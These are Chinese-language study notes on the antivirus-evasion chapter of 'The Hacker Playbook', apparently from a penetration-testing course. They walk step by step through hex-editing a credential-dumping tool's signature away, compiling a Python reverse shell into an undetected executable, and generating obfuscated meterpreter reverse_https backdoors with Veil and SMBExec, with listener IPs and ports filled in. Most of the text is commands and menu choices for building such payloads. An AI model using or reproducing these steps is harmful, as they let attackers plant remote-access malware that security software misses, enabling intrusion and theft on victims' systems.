[The Hacker Playbook] 7.THE QUARTERBACK SNEAK-EVADING AV

1.EVADING AV
1.1 HIDING WCE FROM AV(WINDOWS)
首先下载 Evade(https://www.securepla.net/antivirus-now-you-see-me-now-you-dont/),此软件的作用是以指定大小分割文件。例如，一个50K大小的文件，以5K来分割，总共会得到10个文件，前三个文件大小分为为5K，10K，15K，以此类推，最后一个文件大小为50K。
用杀毒软件分别扫描这10个文件，例如当扫到第5个文件时报警，那么就认为杀软的签名命中了第4个文件结束至第5个文件结束位置的字节。接下来可以再次利用Evade对第5个文件进行更细粒度的分割，最终找到特征串。
打开原文件用 HxD将特征串修改为其他字母并保存，执行后杀软不再报警。这个例子比较特殊，因为修改的部分没有影响到可行性文件的执行。
1.2 PYTHON
1.2.1 Python Shell
使用python编写回连的shell，并用pyinstalller将其转换为exe文件，用杀软扫描此文件，不报警。
python pyinstaller.py --out=C:\shell\ --noconsole --onefile "C:\shell\shell.py"
1.2.2 Python Keylogger
1.2.3 Veil Example(Kali Linux)
Veil是一种payload生成器，用来绕过杀软工具。
cd /opt/Veil
./Veil.py
下一步选择了MeterHTTPSContained payload
use 20
接下来像在metasploit中一样，配置相应参数
set LHOST 192.168.75.131
set LPORT 443
generate
选择生成payload的方式，这里选择Pyinstaller
1
可执行文件最终保存在/root/veil-output/compiled/folder中
1.2.4 SMBExec(Kali Linux)

SMBExec包含很多不同的功能，这里介绍其从生成一个混淆处理后的meterpreter可执行文件。

cd /opt/smbexec

./smbexec.sh
选择System Access
2
选择创建一个可执行文件，和rc脚本
2
选择windows/meterpreter/reverse_https
2
输入你的本地主机IP和端口号
172.16.139.209
443
执行结束后，会在同目录下生成一个新的文件夹，名称类似于时间戳。在文件夹中会看到backdoor.exe文件，这就是生成的混淆处理后的meterpreter可执行文件。